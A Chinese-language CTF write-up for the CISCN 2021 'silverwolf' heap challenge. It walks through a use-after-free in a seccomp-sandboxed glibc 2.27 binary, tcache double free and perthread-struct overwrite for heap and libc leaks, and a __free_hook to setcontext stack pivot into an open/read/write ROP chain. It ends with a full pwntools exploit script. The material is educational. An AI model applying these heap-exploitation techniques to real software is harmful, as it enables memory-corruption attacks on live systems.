[CISCN 2021 初赛]silverwolf ---- 堆上的ORW#

尝试复现一些大赛的题目，主要是感觉一点长进都没有，一直刷题不知道学了些什么…

这题主要是堆上的ORW,跟着gets的博客来的

废话不多说，开始，pwninit一下

1
❯ pwninit pwn
2
[INFO] 当前已在虚拟环境中: ctf
3
[INFO] 给二进制文件添加执行权限...
4
[SUCCESS] 权限添加成功: pwn
5
[INFO] 检查二进制文件保护:
6
==================================
7
[*] '/mnt/d/TY/网安笔记/CTF_PWN/复现/CISCN_2021_初赛_silverwolf/pwn'
8
    Arch:       amd64-64-little
9
    RELRO:      Full RELRO
10
    Stack:      Canary found
11
    NX:         NX enabled
12
    PIE:        PIE enabled
13
    FORTIFY:    Enabled
14
==================================
15
[INFO] 生成exp.py模板...
16
[SUCCESS] exp.py生成成功
17
[SUCCESS] 初始化完成！

可以看到保护全开，稍微运行了一下，基本的菜单题，拖ida看看

程序#

main#

我将函数稍微重命名了一下，

1
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
2
{
3
  __int64 v3[5]; // [rsp+0h] [rbp-28h] BYREF
4

5
  v3[1] = __readfsqword(0x28u);
6
  init_();
7
  while ( 1 )
8
  {
9
    puts("1. allocate");
10
    puts("2. edit");
11
    puts("3. show");
12
    puts("4. delete");
13
    puts("5. exit");
14
    __printf_chk(1LL, "Your choice: ");
15
    __isoc99_scanf(&unk_1144, v3);
16
    switch ( v3[0] )
17
    {
18
      case 1LL:
19
        add();                                  // malloc chunk_size <= 0x78
20
        break;
21
      case 2LL:
22
        edit();
23
        break;
24
      case 3LL:
25
        show();
26
        break;
27
      case 4LL:
28
        delete();                               // UAF
29
        break;
30
      case 5LL:
31
        exit(0);
32
      default:
33
        puts("Unknown");
34
        break;
35
    }
36
  }
37
}

init_#

存在沙盒

1
__int64 init_()
2
{
3
  __int64 v0; // rbx
4

5
  setvbuf(stdin, 0LL, 2, 0LL);
6
  setvbuf(stdout, 0LL, 2, 0LL);
7
  setvbuf(stderr, 0LL, 2, 0LL);
8
  v0 = seccomp_init(0LL);
9
  seccomp_rule_add(v0, 2147418112LL, 0LL, 0LL);
10
  seccomp_rule_add(v0, 2147418112LL, 2LL, 0LL);
11
  seccomp_rule_add(v0, 2147418112LL, 1LL, 0LL);
12
  return seccomp_load(v0);
13
}

1
//seccomp-tools dump ./pwn   只给了read open write，很明显打堆上的ORW
2
❯ seccomp-tools dump ./pwn
3
 line  CODE  JT   JF      K
4
=================================
5
 0000: 0x20 0x00 0x00 0x00000004  A = arch
6
 0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
7
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
8
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
9
 0004: 0x15 0x00 0x04 0xffffffff  if (A != 0xffffffff) goto 0009
10
 0005: 0x15 0x02 0x00 0x00000000  if (A == read) goto 0008
11
 0006: 0x15 0x01 0x00 0x00000001  if (A == write) goto 0008
12
 0007: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0009
13
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
14
 0009: 0x06 0x00 0x00 0x00000000  return KILL

add#

这里是存在一些问题的，可以看到，程序在输入index之后会有一个**!size**的判断，所以index一定得为0，也就算是说，后面申请的chunk会把前面申请的chunk堵盖掉，同时限制malloc的chunk大小得小于等于0x78

1
unsigned __int64 add()
2
{
3
  size_t chunk_size; // rbx
4
  void *ptr; // rax
5
  size_t size; // [rsp+0h] [rbp-18h] BYREF
6
  unsigned __int64 v4; // [rsp+8h] [rbp-10h]
7

8
  v4 = __readfsqword(0x28u);
9
  __printf_chk(1LL, "Index: ");
10
  __isoc99_scanf((__int64)&unk_1144, (__int64)&size);
11
  if ( !size )
12
  {
13
    __printf_chk(1LL, "Size: ");
14
    __isoc99_scanf((__int64)&unk_1144, (__int64)&size);
15
    chunk_size = size;
16
    if ( size > 0x78 )
17
    {
18
      __printf_chk(1LL, "Too large");
19
    }
20
    else
21
    {
22
      ptr = malloc(size);
23
      if ( ptr )
24
      {
25
        size_list = chunk_size;
26
        heap_list = ptr;
27
        puts("Done!");
28
      }
29
      else
30
      {
31
        puts("allocate failed");
32
      }
33
    }
34
  }
35
  return __readfsqword(0x28u) ^ v4;
36
}

edit#

同时edit也是同样的，有一个判断，v3得为0，也就是只能修改第一个chunk，并且允许我们往chunk里面读取内容

1
unsigned __int64 edit()
2
{
3
  _BYTE *v0; // rbx
4
  char *v1; // rbp
5
  __int64 v3; // [rsp+0h] [rbp-28h] BYREF
6
  unsigned __int64 v4; // [rsp+8h] [rbp-20h]
7

8
  v4 = __readfsqword(0x28u);
9
  __printf_chk(1LL, "Index: ");
10
  __isoc99_scanf((__int64)&unk_1144, (__int64)&v3);
11
  if ( !v3 )
12
  {
13
    if ( heap_list )
14
    {
15
      __printf_chk(1LL, "Content: ");
16
      v0 = heap_list;
17
      if ( size_list )
18
      {
19
        v1 = (char *)heap_list + size_list;
20
        while ( 1 )
21
        {
22
          read(0, v0, 1uLL);
23
          if ( *v0 == 10 )
24
            break;
25
          if ( ++v0 == v1 )
26
            return __readfsqword(0x28u) ^ v4;
27
        }
28
        *v0 = 0;
29
      }
30
    }
31
  }
32
  return __readfsqword(0x28u) ^ v4;
33
}

show#

很正常的打印

1
unsigned __int64 show()
2
{
3
  __int64 v1; // [rsp+0h] [rbp-18h] BYREF
4
  unsigned __int64 v2; // [rsp+8h] [rbp-10h]
5

6
  v2 = __readfsqword(0x28u);
7
  __printf_chk(1LL, "Index: ");
8
  __isoc99_scanf((__int64)&unk_1144, (__int64)&v1);
9
  if ( !v1 && heap_list )
10
    __printf_chk(1LL, "Content: %s\n", (const char *)heap_list);
11
  return __readfsqword(0x28u) ^ v2;
12
}

delete#

存在很明显的UAF漏洞，

1
unsigned __int64 delete()
2
{
3
  __int64 v1; // [rsp+0h] [rbp-18h] BYREF
4
  unsigned __int64 v2; // [rsp+8h] [rbp-10h]
5

6
  v2 = __readfsqword(0x28u);
7
  __printf_chk(1LL, "Index: ");
8
  __isoc99_scanf((__int64)&unk_1144, (__int64)&v1);
9
  if ( !v1 && heap_list )
10
    free(heap_list);
11
  return __readfsqword(0x28u) ^ v2;
12
}

分析#

目前已知有UAF漏洞，并且题目是Glibc2.27的，所以存在tcache bin，并且需要打ORW，其实在这之前我并没有打过堆上的ORW,现在进行尝试，首先我们肯定需要泄漏libc地址，而一般利用unshorbin的chunk，因为ub的fd和bk都是指向main_anera+一个偏移的地址，但是现在只能申请小于等于0x78大小的chunk，那么现在的问题就是怎么申请到非fasrbin的chunk,而我们是处于Glibc2.27的环境下，而tcache bin会申请一个很大的chunk，用于管理tcache bin里面的chunk,这个大的chunk在Glibc2.27大小是0x251，而由于开启了沙盒，导致会有很多杂乱的chunk，如图

那么现在如果我们能够把这个chunk free掉，不就可以使得它进ub，从而得到libc_addr嘛？，因此我们现在需要得到得到chunk的地址，那么怎么得到呢？在Glibc2.27针对tcache bin引入了key这个用于检测double free的机制，当一个chunk被free掉，进入tcache bin的时候，会把这个地址写入到chunk_addr+8的位置，因此，利用这个机制，我们可以泄漏得到heap_addr,

leak_heap_addr#

那么好，现在先来处理泄漏heap_addr的问题，那么现在的问题是：这个key会检测double free,如果不能double free，那么我们目前无法将free掉的这个tcache chunk的fd修改为处于头部的0x251的chunk,那么就无法通过ub泄漏地址，所以我们需要把这个key覆盖掉，随便覆盖成什么，因为地址后面第二次free的时候会重新覆盖上，那么好，来看变化：

1
def exp():
2
    for i in range(7):
3
        add(0x78)
4
        edit(b'source')
5
    edit(b'a'*0x10)
6
    delete()
7
    edit(b'a'*0x10)
8
    bug()
9
exp()
10
itr()

这里是存在问题的，这里直接show是得不到这个地址的，因为前面是0，会被 __printf_chk截断掉，所以必须double free

好了，现在我们就可以double free,并且泄漏地址了，

拿到地址，为了简约，将代码修改成这样，并且将泄漏的地址低三位取0，这样得到堆的基地址

1
# ========== Exploit 开始 ==========
2
def exp():
3
    for i in range(7):
4
        add(0x78)
5
        edit(b'source')
6
    for i in range(2):
7
        edit(b'a'*0x10)
8
        delete()
9
    show()
10
    ru("Content: ")
11
    heap_addr = uu64(ru(b'\x0a',drop=True))&0xffffffffff000
12
    leak("heap_addr",heap_addr)
13
    bug()
14
exp()
15
itr()

修改fd为tcache的大chunk#

因为已经double free，并且存在uaf我可以去修改chunk的fd为tcache,进而让我们能够拿到libc的地址，

1
    edit(p64(heap_addr+0x10))
2
    add(0x78)
3
    add(0x78)

修改这个chunk，并且free，泄漏libc#

现在这里需要将tcache bin的机制来复习学习

tcache bin其实是依靠最开始申请的这个大的chunk来控制的，前面一部分是count部分，就是用来管理chunk的数量的，也就是tcache_perthread_struct里面的counts部分，其实tcache_puts和tcache_gets就是依照这个counts来确定tcachebin里面是否存在chunk的，如果说我们把这个覆盖成7，那么再次释放对应大小的chunk就不会进入tcachebin，直接进入unshortbin或者fastbin，其中每个counts所占字节大小其实不是固定的，会随着版本的变化而变化，最好的解决办法是看源码，或者，直接调试，那么接下来是调试的办法，这里是另一个题目的，不是这道题的，只是举一个例子

所以这里counts的大小就是两个字节

这样就是对应的距离了，

好了，既然了解了这部分counts的知识，现在我们是在这个0x251的chunk上，那么现在找到0x250的位置，并且将对应的部分覆盖为7，并且free掉这个chunk使其进入ub，从而泄漏地址

1
    edit(b'\x00'*0x23+b'\x07')
2
    delete()
3
    show()
4
    libc_base = l64()-0x3ebca0
5
    leak("libc_base",libc_base)

这里的libc_base可以直接硬编码计算，也可以使用其他方法，比如减去libc.sym.main_anera

接下来就要考虑ORW了#

因为开启了沙箱，很明显，只想让我们打ORW,

1
❯ seccomp-tools dump ./pwn
2
 line  CODE  JT   JF      K
3
=================================
4
 0000: 0x20 0x00 0x00 0x00000004  A = arch
5
 0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
6
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
7
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
8
 0004: 0x15 0x00 0x04 0xffffffff  if (A != 0xffffffff) goto 0009
9
 0005: 0x15 0x02 0x00 0x00000000  if (A == read) goto 0008
10
 0006: 0x15 0x01 0x00 0x00000001  if (A == write) goto 0008
11
 0007: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0009
12
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
13
 0009: 0x06 0x00 0x00 0x00000000  return KILL

首先让我们回想一下在栈上打ORW的时候是什么样子的，要么构造ROP，要么写shellcode,而在堆上是没有办法直接在堆内存上执行代码的，现在就要引申一个概念，就是栈迁移是为了什么，栈迁移是不是实际上就是通过rbp去控制rsp，这样就把rsp迁移到任意位置，这样的话栈也就被迁移到其他地方了,接下来只要这个地方存在ROP，就可以直接执行，因为ROP的gadget在text段上，可以直接执行，那么这是在栈上，一般也会迁移到.bss段上，但是在堆上呢？应该怎么做？

而在Glibc中有这么一个函数，setcontext，而这个函数又以2.27,2.29为分界，在这里不详细说明，下面是这个函数在2.27的样子，

主要注意这部分，可以看到是使用rdi来控制所有通用寄存器的值，但是这里不重要，重要的是，这里会通过rdi+0xa0的地址给rsp,sp是栈顶指针，也就是rsp往下，都会被认为是栈，这样的话不就可以控制rsp去执行ROP-----ORW了嘛，那么我们现在需要考虑怎么布置这个伪造的栈帧了，其实如果想执行到这里，那么我们也许需要借助hook函数，

首先这里是通过rdi来控制的，所以rdi一定得是堆上的某个地址，因为我们需要在堆上执行ORW,

那么我们应该怎么布置这些呢？,如下，

1
   pay = b'\x02'*0x40+p64(libc_base+libc.sym.__free_hook)+p64(0)
2
    pay += p64(heap_addr+0x1000)    # flag_addr heap:0x40
3
    pay += p64(heap_addr+0x2000)    # fake_chunk heap:0x50
4
    pay += p64(heap_addr+0x20a0)    # stack 2 heap:0x60
5
    pay += p64(heap_addr+0x3000)    # orw1 heap:0x70
6
    pay += p64(heap_addr+0x3060)    # orw2 heap:0x80 continue orw1

现在的我们还处于tcache bin 的这个巨大的结构体堆里面，这个时候我们还是可以通过这个结构体来布置chunk的，首先把前面的counts填一下，随便填一点，然后就是free_hook,从这里开始是tcache bin里面每一个chunk队列的头的地址对应的chunk的地址，也就是tcache_entry->*next，~~我在说什么呢？~~,其实就是chunk队列的头，链接的chunk，就比如：0x20：chunk1—>chunk2，这里我所讲的就是chunk1

那么按照这样布置，就会使得对应size的chunk地址为我们所布置的，

1
0x20-->free_hook；0x30用不上，所以随意覆盖；
2
0x40-->heap_addr+0x1000；0x50-->heap_addr+0x2000；
3
0x60-->heap_addr+0x20a0；0x70 -->heap_addr+0x3000 ;
4
0x80 -->heap_addr+0x3060

那么现在，只要申请对应size大小就可以控制对应的内存了，至于这里的chunk的地址为什么是这样的，我一个一个的解释，

还记得上面说过的，需要把rsp控制到堆上吗？而在Glibc2.27里面setcontext是使用rdi去控制的，（注；2.29貌似是rdx控制的），所以我们需要控制rdi,而free_hook在释放chunk的时候，rdi里面的值，刚好会是你free的那个堆块的地址，那么这样不就可以把rdi控制为我们指定的chunk的地址吗？接下来0x40~0x80这几个chunk的作用，也许你们就知道是什么了，其中0x70和0x80是为了布置ORW读取flag的fake_stack，因为ROP链太长了，导致一个chunk的空间不够，所以需要两个相邻的chunk来拼接，然后0x40的chunk是为了读”flag”这个字符串，并且可以把flag的内容读在上面，

注意接下来的操作：首先把tcache bin里面的0x20的chunk申请出来，并且修改为setcontext+53的位置，(因为setcontext+53的位置是mov rsp,[rsi+0xa0])，这样下次执行free的时候就会直接跳到setcontext+53的位置，从而将rsp移动到对应的位置，那么这里是第一步，接下来我们需要干啥呢？第二步，我们需要构造一下，我们需要把0x60这个chunk的内容上放上heap+0x3000也就是ORW的地址，那么现在，我们如果把0x50那个chunk释放掉，就会使得rdi == chunk_size_0x50 ~~表意写法，不要在意~~，并且同时触发setcontext,将rdi+0xa0地方的内容给rsp，这里rdi+0xa0的地方其实就是heap_base+0x2000+a0 ====> heap_base+0x20a0，那么这个地方的值是什么呢？那不就是我们前面的heap_base+0x3000吗？那么不就把rsp放当orw上来了吗？这样就可以在执行完setcontext之后执行ORW了，但是需要注意的是在修改0x60这个chunk的内容为heap_base+0x3000的时候，后面还需要加一个ret，因为setcontext里面有一个push,为了平衡，需要ret弄回来，

并且在构造ORW的时候，需要注意open要使用syscall的方式构造不可以直接调用，要用syscall，这是因为在2.27里，open函数开始的位置会影响栈布局，具体如下:

而read和write就不会

完整EXP#

1
#!/usr/bin/env python3
2
from pwn import *
3
from LibcSearcher import *
4

5
# 配置
6
context(os='linux', arch='amd64', log_level='debug')
7
binary = "./pwn"
8

9
# 远程/本地切换
10
if args.get("REMOTE"):
11
    io = remote("node4.anna.nssctf.cn",28172)
12
else:
13
    io = process(binary)
14

15
# ELF加载
16
elf = ELF(binary)
17
libc = ELF("./libc-2.27.so")
18

19
# ========== 常用函数定义 ==========
20
s       = lambda data               : io.send(data)
21
sa      = lambda delim, data        : io.sendafter(str(delim), data)
22
sl      = lambda data               : io.sendline(data)
23
sla     = lambda delim, data        : io.sendlineafter(str(delim), data)
24
r       = lambda num=4096           : io.recv(num)
25
rl      = lambda                    : io.recvline()
26
ru      = lambda delims, drop=False : io.recvuntil(delims, drop)
27
itr     = lambda                    : io.interactive()
28
uu32    = lambda data               : u32(data.ljust(4, b'\x00'))
29
uu64    = lambda data               : u64(data.ljust(8, b'\x00'))
30
leak    = lambda name, addr         : log.success('{} ======== > {:#x}'.format(name, addr))
31
p       = lambda name,data          : print("{} ======== > {}".format(name,data))
32

33
# ========== 常用泄露函数 ==========
34
l64     = lambda                    : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
35
l32     = lambda                    : u32(io.recvuntil(b"\xf7")[-4:].ljust(4, b"\x00"))
36
l64_no  = lambda                    : u64(io.recv(6).ljust(8, b'\x00'))
37
def bug():
38
  gdb.attach(io)
39
  pause()
40
# [+] ========= Some funtion ========= [+]
41
def add(size):
42
    sla("Your choice:",str(1))
43
    sla("Index:",str(0))
44
    sla("Size:",str(size))
45

46
def edit(content):
47
    sla("Your choice:",str(2))
48
    sla("Index:",str(0))
49
    sla("Content:",content)
50

51
def delete():
52
    sla("Your choice:",str(4))
53
    sla("Index:",str(0))
54

55
def show():
56
    sla("Your choice:",str(3))
57
    sla("Index:",str(0))
58

59
# ========== Exploit 开始 ==========
60
def exp():
61
    for i in range(7):
62
        add(0x78)
63
        edit(b'source')
64
    for i in range(2):
65
        edit(b'a'*0x10)
66
        delete()
67
    show()
68
    ru("Content: ")
69
    heap_addr = uu64(ru(b'\x0a',drop=True))&0xffffffffff000
70
    leak("heap_addr",heap_addr)
71
    edit(p64(heap_addr+0x10))
72
    add(0x78)
73
    add(0x78)
74

75
    edit(b'\x00'*0x23+b'\x07')
76
    delete()
77
    show()
78

79
    libc_base = l64()-0x3ebca0
80
    leak("libc_base",libc_base)
81
    bug()
82
    # [+] ========= change stuck from tcache ========= [+]
83
    pay = b'\x02'*0x40+p64(libc_base+libc.sym.__free_hook)+p64(0)
84
    pay += p64(heap_addr+0x1000)    # flag_addr heap:0x40
85
    pay += p64(heap_addr+0x2000)    # fake_chunk heap:0x50
86
    pay += p64(heap_addr+0x20a0)    # stack 2 heap:0x60
87
    pay += p64(heap_addr+0x3000)    # orw1 heap:0x70
88
    pay += p64(heap_addr+0x3060)    # orw2 heap:0x80 continue orw1
89
    edit(pay)
90

91
    # [+] ====== Some addr ======= [+]
92
    rax = libc_base+0x000000000001b500
93
    rdi = libc_base+0x000000000002164f
94
    rsi = libc_base+0x0000000000023a6a
95
    rdx = libc_base+0x0000000000001b96
96
    ret = libc_base+0x00000000000008aa
97
    syscall = libc_base+libc.sym.read+15
98
    leave_ret = libc_base+0x00000000000547e3
99

100
    setcontext = libc_base+libc.sym.setcontext+53
101
    read = libc_base+libc.sym.read
102
    write = libc_base+libc.sym.write
103
    flag = heap_addr+0x1000
104
    get_flag = heap_addr+0x3000
105

106
    # [+] ====== O R W ========== [+]
107
    o = p64(rdi)+p64(flag)
108
    o += p64(rsi)+p64(0)
109
    o += p64(rax)+p64(2)
110
    o += p64(syscall)
111

112
    r = p64(rdi)+p64(3)
113
    r += p64(rsi)+p64(get_flag)
114
    r += p64(rdx)+p64(0x100)
115
    r += p64(read)
116

117
    w = p64(rdi)+p64(1)
118
    w += p64(write)
119

120
    orw = o+r+w
121

122
    leak("setcontext",setcontext)
123
    add(0x18)
124
    edit(p64(setcontext))
125

126
    add(0x38)
127
    edit(b'/flag')
128

129
    add(0x68)
130
    edit(orw[:0x60])    # orw1
131
    add(0x78)
132
    edit(orw[0x60:])    # orw2
133

134
    add(0x58)
135
    edit(p64(heap_addr+0x3000)+p64(ret))
136
    add(0x48)
137
    #gdb.attach(io)
138
    delete()
139
    #pause()
140
    #bug()
141
exp()
142
itr()